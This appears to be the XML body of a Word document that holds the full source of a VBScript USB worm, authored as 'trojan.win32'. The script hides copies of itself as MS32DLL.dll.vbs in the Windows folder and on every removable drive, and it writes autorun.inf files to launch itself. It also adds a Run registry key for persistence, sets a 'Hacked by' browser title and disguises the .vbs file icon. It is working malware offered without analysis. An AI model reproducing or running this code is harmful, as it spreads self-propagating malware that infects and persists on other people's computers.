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A6" w:rsidRDefault="00761DA6" w:rsidP="00761DA6">
      <w:r>
        <w:t>on error resume next</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00761DA6" w:rsidRDefault="00761DA6" w:rsidP="00761DA6">
      <w:r>
        <w:t>dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00761DA6" w:rsidRDefault="00761DA6" w:rsidP="00761DA6">
      <w:r>
        <w:t>atr = "[autorun]"&amp;vbcrlf&amp;"shellexecute=wscript.exe MS32DLL.dll.vbs"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00761DA6" w:rsidRDefault="00761DA6" w:rsidP="00761DA6"/>
    <w:p w:rsidR="00761DA6" w:rsidRDefault="00761DA6" w:rsidP="00761DA6">
      <w:r>
        <w:t>set fs = createobject("Scripting.FileSystemObject")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00761DA6" w:rsidRDefault="00761DA6" w:rsidP="00761DA6">
      <w:r>
        <w:t>set mf = fs.getfile(Wscript.ScriptFullname)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00761DA6" w:rsidRDefault="00761DA6" w:rsidP="00761DA6">
      <w:r>
        <w:t>dim text,size</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00761DA6" w:rsidRDefault="00761DA6" w:rsidP="00761DA6">
      <w:r>
        <w:t>size = mf.size</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00761DA6" w:rsidRDefault="00761DA6" w:rsidP="00761DA6">
      <w:r>
        <w:t>check = mf.drive.drivetype</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00761DA6" w:rsidRDefault="00761DA6" w:rsidP="00761DA6">
      <w:r>
        <w:t>set text=mf.openastextstream(1,-2)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00761DA6" w:rsidRDefault="00761DA6" w:rsidP="00761DA6">
      <w:r>
        <w:t>do while not text.atendofstream</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00761DA6" w:rsidRDefault="00761DA6" w:rsidP="00761DA6">
      <w:r>
        <w:t>mysource=mysource&amp;text.readline</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00761DA6" w:rsidRDefault="00761DA6" w:rsidP="00761DA6">
      <w:r>
        <w:t>mysource=mysource &amp; vbcrlf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00761DA6" w:rsidRDefault="00761DA6" w:rsidP="00761DA6">
      <w:r>
        <w:t>loop</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00761DA6" w:rsidRDefault="00761DA6" w:rsidP="00761DA6">
      <w:r>
        <w:t>do</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00761DA6" w:rsidRDefault="00761DA6" w:rsidP="00761DA6">
      <w:r>
        <w:t>Set winpath = fs.getspecialfolder(0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00761DA6" w:rsidRDefault="00761DA6" w:rsidP="00761DA6">
      <w:r>
        <w:t>set tf = fs.getfile(winpath &amp; "MS32DLL.dll.vbs")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00761DA6" w:rsidRDefault="00761DA6" w:rsidP="00761DA6">
      <w:r>
        <w:t>tf.attributes = 32</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00761DA6" w:rsidRDefault="00761DA6" w:rsidP="00761DA6">
      <w:r>
        <w:t>set tf=fs.createtextfile(winpath &amp; "MS32DLL.dll.vbs",2,true)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00761DA6" w:rsidRDefault="00761DA6" w:rsidP="00761DA6">
      <w:r>
        <w:t>tf.write mysource</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00761DA6" w:rsidRDefault="00761DA6" w:rsidP="00761DA6">
      <w:r>
        <w:t>tf.close</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00761DA6" w:rsidRDefault="00761DA6" w:rsidP="00761DA6">
      <w:r>
        <w:t>set tf = fs.getfile(winpath &amp; "MS32DLL.dll.vbs")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00761DA6" w:rsidRDefault="00761DA6" w:rsidP="00761DA6">
      <w:r>
        <w:t>tf.attributes = 39</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00761DA6" w:rsidRDefault="00761DA6" w:rsidP="00761DA6">
      <w:r>
        <w:t>for each flashdrive in fs.drives</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00761DA6" w:rsidRDefault="00761DA6" w:rsidP="00761DA6">
      <w:r>
        <w:t>If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path &lt;&gt; "A:" then</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00761DA6" w:rsidRDefault="00761DA6" w:rsidP="00761DA6">
      <w:r>
        <w:t>set tf=fs.getfile(flashdrive.path &amp;"MS32DLL.dll.vbs")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00761DA6" w:rsidRDefault="00761DA6" w:rsidP="00761DA6">
      <w:r>
        <w:t>tf.attributes =32</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00761DA6" w:rsidRDefault="00761DA6" w:rsidP="00761DA6">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>set tf=fs.createtextfile(flashdrive.path &amp;"MS32DLL.dll.vbs",2,true)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00761DA6" w:rsidRDefault="00761DA6" w:rsidP="00761DA6">
      <w:r>
        <w:t>tf.write mysource</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00761DA6" w:rsidRDefault="00761DA6" w:rsidP="00761DA6">
      <w:r>
        <w:t>tf.close</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00761DA6" w:rsidRDefault="00761DA6" w:rsidP="00761DA6">
      <w:r>
        <w:t>set tf=fs.getfile(flashdrive.path &amp;"MS32DLL.dll.vbs")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00761DA6" w:rsidRDefault="00761DA6" w:rsidP="00761DA6">
      <w:r>
        <w:t>tf.attributes =39</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00761DA6" w:rsidRDefault="00761DA6" w:rsidP="00761DA6">
      <w:r>
        <w:t>set tf =fs.getfile(flashdrive.path &amp;"autorun.inf")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00761DA6" w:rsidRDefault="00761DA6" w:rsidP="00761DA6">
      <w:r>
        <w:t>tf.attributes = 32</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00761DA6" w:rsidRDefault="00761DA6" w:rsidP="00761DA6">
      <w:r>
        <w:t>set tf=fs.createtextfile(flashdrive.path &amp;"autorun.inf",2,true)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00761DA6" w:rsidRDefault="00761DA6" w:rsidP="00761DA6">
      <w:r>
        <w:t>tf.write atr</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00761DA6" w:rsidRDefault="00761DA6" w:rsidP="00761DA6">
      <w:r>
        <w:t>tf.close</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00761DA6" w:rsidRDefault="00761DA6" w:rsidP="00761DA6">
      <w:r>
        <w:t>set tf =fs.getfile(flashdrive.path &amp;"autorun.inf")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00761DA6" w:rsidRDefault="00761DA6" w:rsidP="00761DA6">
      <w:r>
        <w:t>tf.attributes=39</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00761DA6" w:rsidRDefault="00761DA6" w:rsidP="00761DA6">
      <w:r>
        <w:t>end if</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00761DA6" w:rsidRDefault="00761DA6" w:rsidP="00761DA6">
      <w:r>
        <w:t>next</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00761DA6" w:rsidRDefault="00761DA6" w:rsidP="00761DA6">
      <w:r>
        <w:t>set rg = createobject("WScript.Shell")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00761DA6" w:rsidRDefault="00761DA6" w:rsidP="00761DA6">
      <w:r>
        <w:t>rg.regwrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunMS32DLL",winpath&amp;"MS32DLL.dll.vbs"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00761DA6" w:rsidRDefault="00761DA6" w:rsidP="00761DA6">
      <w:r>
        <w:t xml:space="preserve">rg.regwrite "HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerMainWindow Title","Hacked by </w:t>
      </w:r>
      <w:r w:rsidR="00A15452">
        <w:t>batex nst</w:t>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00761DA6" w:rsidRDefault="00761DA6" w:rsidP="00761DA6">
      <w:r>
        <w:t>rg.regwrite "HKCRvbsfileDefaultIcon","shell32.dll,2"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00761DA6" w:rsidRDefault="00761DA6" w:rsidP="00761DA6">
      <w:r>
        <w:t>if check &lt;&gt; 1 then</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00761DA6" w:rsidRDefault="00761DA6" w:rsidP="00761DA6">
      <w:r>
        <w:t>Wscript.sleep 200000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00761DA6" w:rsidRDefault="00761DA6" w:rsidP="00761DA6">
      <w:r>
        <w:t>end if</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00761DA6" w:rsidRDefault="00761DA6" w:rsidP="00761DA6">
      <w:r>
        <w:t>loop while check&lt;&gt;1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00761DA6" w:rsidRDefault="00761DA6" w:rsidP="00761DA6">
      <w:r>
        <w:t>set sd = createobject("Wscript.shell")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002247AC" w:rsidRDefault="00761DA6" w:rsidP="00761DA6">
      <w:r>
        <w:t>sd.run winpath&amp;"explorer.exe /e,/select, "&amp;Wscript.ScriptFullname</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="002247AC" w:rsidSect="00356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61DA6"/>
    <w:rsid w:val="002247AC"/>
    <w:rsid w:val="003566A2"/>
    <w:rsid w:val="00761DA6"/>
    <w:rsid w:val="00A1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trojan.win32</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>trojan.win32</cp:lastModifiedBy>
  <cp:revision>4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2010-10-15T10:37:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2010-10-17T10:12:00Z</dcterms:modified>
</cp:coreProperties>
</file>